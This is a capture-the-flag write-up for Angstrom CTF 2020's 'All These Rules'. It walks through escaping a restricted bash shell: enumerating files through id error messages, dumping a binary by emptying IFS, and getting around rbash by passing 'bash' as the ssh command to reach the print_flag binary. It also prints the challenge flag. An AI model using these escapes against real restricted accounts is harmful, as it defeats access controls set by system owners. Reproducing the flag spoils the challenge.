All These Rules [misc]
Angstrom CTF 2020

All These Rules

Clam can't do this, he can't do that, wouldn't it be nice if there were something that he could do?

ssh chall@misc.2020.chall.actf.co -p 20209

Recon

If we login with the ssh command we end up in a restricted shell. We tried some default linux commands and found that we could only use the id command.

chall@769b0ae9d585:~$ id 
uid=1000(chall) gid=1000(chall) groups=1000(chall)

We couldn't see any directory listing, but we could start id with an argument with wildcards and the error message would give us some more information. This way we found a /flag file.

chall@769b0ae9d585:~$ id /????
id: extra operand '/flag'

Next thing we tried to do is to use the contents of the file as input for id.

chall@769b0ae9d585:~$ id "$(</flag)"
id: '': no such user

This made us think that /flag maybe could be a directory.

chall@769b0ae9d585:~$ id /flag/*
id: extra operand '/flag/print_flag'
Try 'id --help' for more information.

Seems we got a binary file which would print the flag in /flag/print_flag, but we couldn't run it in the restricted shell because we can't use /.

chall@769b0ae9d585:~$ /flag/print_flag
rbash: /flag/print_flag: restricted: cannot specify `/' in command names

But we could probably dump the binary by using it's contents as argument for the id command. We do this by emptying IFS first.

chall@769b0ae9d585:~$ IFS=""
chall@769b0ae9d585:~$ id $(</flag/print_flag)
rbash: warning: command substitution: ignored null byte in input
id: '\177ELF\002\001\001\003>\001`\a@\220\032@8\t@\035\034\006\004@@@\370\001\370\001\b\003\0048\0028\0028\002\034\034\001\001\005h\vh\v \001\006\200\r\200\r \200\r \220\002\230\002 \002\006\220\r\220\r \220\r \360\001\360\001\b\004\004T\002T\002T\002DD\004P\345td\004\374\t\374\t\374\tDD\004Q\345td\006\020R\345td\004\200\r\200\r \200\r \200\002\200\002\001/lib64/ld-linux-x86-64.so.2\004\020\001GNU\003\002\004\024\003GNU]\272\344\334\f\360\365\346n\334\273\252,ti\020U\031o\217\001\001\001\202 \026\022\033\0229\022,\022Z\0223\022\236 C\022\020\022\v\022\255 K"libc.so.6exitfopenputs__stack_chk_failprintffgetssetresgidgetegid__cxa_finalize__libc_start_mainGLIBC_2.4GLIBC_2.2.5_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTable\002\003\002\002\002\002\002\002\002\002\001\002\001\020\024ii\r\003l\020u\032i\t\002v\200\r \b`\b\210\r \b \b\b\020 \b\b\020 \330\017 \006\001\340\017 \006\006\350\017 \006\b\360\017 \006\f\370\017 \006\r\230\017 \a\002\240\017 \a\003\250\017 \a\004\260\017 \a\005\270\017 \a\a\300\017 \a\t\310\017 \a\n\320\017 \a\vH\203\354\bH\213\005=\t H\205\300t\002\377\320H\203\304\b\303\3775\302\b \377%\304\b \017\037@\377%\302\b h\351\340\377\377\377\377%\272\b h\001\351\320\377\377\377\377%\262\b h\002\351\300\377\377\377\377%\252\b h\003\351\260\377\377\377\377%\242\b h\004\351\240\377\377\377\377%\232\b h\005\351\220\377\377\377\377%\222\b h\006\351\200\377\377\377\377%\212\b h\a\351p\377\377\377\377%\242\b f\2201\355I\211\321^H\211\342H\203\344\360PTL\215\005J\002H\215\r\323\001H\215=\255\001\377\025V\b \364\017\037DH\215=y\b UH\215\005q\b H9\370H\211\345t\031H\213\005*\b H\205\300t\r]\377\340f.\017\037\204]\303\017\037@f.\017\037\204H\215=9\b H\21552\b UH)\376H\211\345H\301\376\003H\211\360H\301\350?H\001\306H\321\376t\030H\213\005\361\a H\205\300t\f]\377\340f\017\037\204]\303\017\037@f.\017\037\204\200=\351\a u/H\203=\307\a UH\211\345t\fH\213=\312\a \350\r\377\377\377\350H\377\377\377\306\005\301\a \001]\303\017\037\200\363\303f\017\037DUH\211\345]\351f\377\377\377UH\211\345H\201\354\240dH\213\004%(H\211E\3701\300\350\227\376\377\377\211\205d\377\377\377\213\225d\377\377\377\213\215d\377\377\377\213\205d\377\377\377\211\316\211\307\350F\376\377\377H\2155#\001H\215=\036\001\350s\376\377\377H\211\205h\377\377\377H\203\275h\377\377\377u\026H\215=\n\001\350\366\375\377\377\277\001\350\\\376\377\377H\213\225h\377\377\377H\215\205p\377\377\377\276\200H\211\307\350\021\376\377\377H\215\205p\377\377\377H\211\306H\215=\346\270\350\346\375\377\377\220H\213E\370dH3\004%(t\005\350\261\375\377\377\311\303UH\211\345\270\350+\377\377\377\270]\303f.\017\037\204AWAVI\211\327AUATL\215%\036\004 UH\215-\036\004 SA\211\375I\211\366L)\345H\203\354\bH\301\375\003\350\037\375\377\377H\205\355t 1\333\017\037\204L\211\372L\211\366D\211\357A\377\024\334H\203\303\001H9\335u\352H\203\304\b[]A\\A]A^A_\303\220f.\017\037\204\363\303H\203\354\bH\203\304\b\303\001\002rflag.txtCannot read flag file.%s\001\033\003;@\a\304\374\377\377\214T\375\377\377\264d\375\377\377\\n\376\377\377\3145\377\377\377\354T\377\377\377\f\001\304\377\377\377T\001\024\001zR\001x\020\001\033\f\a\b\220\001\a\020\024\034\375\377\377+\024\001zR\001x\020\001\033\f\a\b\220\001$\0340\374\377\377\220\016\020F\016\030J\017\vw\b\200?\032;*3$"\024D\230\374\377\377\b\034\\\232\375\377\377\307A\016\020\206\002C\r\006\002\302\f\a\b\034|A\376\377\377\025A\016\020\206\002C\r\006P\f\a\bD\234@\376\377\377eB\016\020\217\002B\016\030\216\003E\016 \215\004B\016(\214\005H\0160\206\006H\0168\203\aM\016@r\0168A\0160A\016(B\016 B\016\030B\016\020B\016\b\020\344h\376\377\377\002`\b \b\001\001\f\240\006\r\304\t\031\200\r \033\b\032\210\r \034\b\365\376\377o\230\002\005\b\004\006\270\002\n\307\v\030\025\003\200\017 \002\300\024\a\027\340\005\a \005\b\300\t\030\036\b\373\377\377o\001\b\376\377\377o\360\004\377\377\377o\001\360\377\377o\320\004\371\377\377o\003\220\r \326\006\346\006\366\006\006\a\026\a&\a6\aF\a\b\020 GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0\003\0018\002\003\002T\002\003\003t\002\003\004\230\002\003\005\270\002\003\006\b\004\003\a\320\004\003\b\360\004\003\t \005\003\n\340\005\003\v\240\006\003\f\300\006\003\rP\a\003\016`\a\003\017\304\t\003\020\320\t\003\021\374\t\003\022@\n\003\023\200\r \003\024\210\r \003\025\220\r \003\026\200\017 \003\027\020 \003\030\020\020 \003\031\001\004\361\377\f\002\016\220\a\016\002\016\320\a!\002\016 \b7\001\030\020\020 \001F\001\024\210\r m\002\016`\by\001\023\200\r \230\004\361\377\001\004\361\377\245\001\022d\v\004\361\377\263\023\210\r \304\001\025\220\r \315\023\200\r \340\021\374\t\363\001\026\200\017 \t\001\022\016\300\t\002\031\001 \311\001 \027\020 5\001\022G\001\020\027\020\020 \023\001\022\017\304\tN\001\022j\001\022\201\001\022\225\001\022\264\001\022\307\001\020\027\020 \324\001 \343\001\021\002\027\b\020 \360\001\021\020\320\t\004\377\001\022\016P\te\277\020\030\030\020 \315\001\022\016`\a+\017\002\022$\002\020\030\020\020 0\002\022\0161\t\0255\002\022H\002\022\016j\b\307S\002\022e\002\021\002\027\020\020 q\002 \213\002"\t\002\022\v\240\006crtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.7698__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryprint_flag.c__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTableputs@@GLIBC_2.2.5_edata__stack_chk_fail@@GLIBC_2.4setresgid@@GLIBC_2.2.5printf@@GLIBC_2.2.5__libc_start_main@@GLIBC_2.2.5fgets@@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used__libc_csu_initgetegid@@GLIBC_2.2.5__bss_startmainfopen@@GLIBC_2.2.5print_flagexit@@GLIBC_2.2.5__TMC_END___ITM_registerTMCloneTable__cxa_finalize@@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.data.bss.comment\033\001\0028\0028\002\034\001#\a\002T\002T\002 \0041\a\002t\002t\002$\004D\366\377\377o\002\230\002\230\002\034\005\bN\v\002\270\002\270\002P\001\006\001\b\030V\003\002\b\004\b\004\307\001^\377\377\377o\002\320\004\320\004\034\005\002\002k\376\377\377o\002\360\004\360\0040\006\001\bz\004\002 \005 \005\300\005\b\030\204\004B\340\005\340\005\300\005\026\b\030\216\001\006\240\006\240\006\027\004\211\001\006\300\006\300\006\220\020\020\224\001\006P\aP\a\b\b\b\235\001\006`\a`\ab\002\020\243\001\006\304\t\304\t\t\004\251\001\002\320\t\320\t)\004\261\001\002\374\t\374\tD\004\277\001\002@\n@\n(\001\b\311\016\003\200\r \200\r\b\b\b\325\017\003\210\r \210\r\b\b\b\341\006\003\220\r \220\r\360\001\006\b\020\230\001\003\200\017 \200\017\200\b\b\352\001\003\020 \020\020\b\360\b\003\020\020 \020\020\b\001\365\0010\020\020)\001\001\001\002@\020\250\006\033+\b\030\t\003\350\026\247\002\001\021\003\217\031\376\001': no such user

We hoped that the binary contained the flag, but no luck there. We see a string flag.txt, so that's probably the file which contains the flag. Well let's open that file and get some points.

chall@769b0ae9d585:~$ id $(</flag/flag.txt)
rbash: /flag/flag.txt: Permission denied
uid=1000(chall) gid=1000(chall) groups=1000(chall)

So it seems we need to find a way to run the print_flag binary. We got a bit stuck here, tried to find more available commands with tab completion, but no useful command was found. Then we tried to run commands in our ssh command while connecting to the server. This somehow gave us a shell which gave us more freedom and we were able to run the print_flag command.

$ ssh chall@misc.2020.chall.actf.co -p 20209 bash 
rbash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
rbash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
bash -i
bash: cannot set terminal process group (5991): Inappropriate ioctl for device
bash: no job control in this shell
bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
chall@769b0ae9d585:~$ pwd             
/home/chall
pwd
chall@769b0ae9d585:~$ cd /flag
cd /flag
chall@769b0ae9d585:/flag$ ./print_flag
./print_flag
actf{woulnt_1t_be_n1ce_t0_jus7_h4v3_s0m3_freed0m}

Flag

actf{woulnt_1t_be_n1ce_t0_jus7_h4v3_s0m3_freed0m}